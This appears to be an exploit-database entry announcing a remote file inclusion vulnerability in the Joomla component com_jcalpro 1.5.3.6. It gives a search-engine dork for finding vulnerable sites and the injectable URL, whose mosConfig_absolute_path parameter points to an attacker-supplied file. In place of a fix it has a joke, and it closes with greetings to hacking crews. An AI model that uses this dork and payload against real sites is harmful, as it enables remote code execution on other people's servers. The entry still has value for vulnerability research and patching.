Joomla! Component com_jcalpro 1.5.3.6 - Remote File Inclusion

Author: kaMtiEz
type: webapps
platform: php
port: 
date_added: 2009-12-12 
date_updated: 2015-07-12 
verified: 0 
codes: CVE-2009-4431;OSVDB-61409 
tags: 
aliases:  
screenshot_url:  
application_url: 

#############################################################################################################
##
## Author : kaMtiEz kamzcrew@yahoo.com)								   ##
## ##Homepage:http://www.indonesiancoder.com    	     					    	    ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.anything-digital.com
[+] version : 1.5.3.6 Stable or upper / lower maybe also affected
[+] Dork : inurl:"com_jcalpro"
#############################################################################################################

[ Vulnerable File ]

http://server/components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=[INDONESIANCODER]

[ BUG ]

cal_popup.php

[ FIX ]

tanya aurakasih mungkin dia tauh :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] Babe enyak adek i love u pull dah ..
[+] Setelah Bertapa kagak jelas ampe pagi sama Om Don Tukuesto ... dan lagi lagi akhirnya nemu lobang :D
[+] iseng2 berhadiah bugs .. omegod >.<
[+] capek juga dari surabaya .. fyuh .,.
[ QUOTE ]

[+] one day .. u will be mind .. >.<
[+] AURAKASIH u are so  .. hha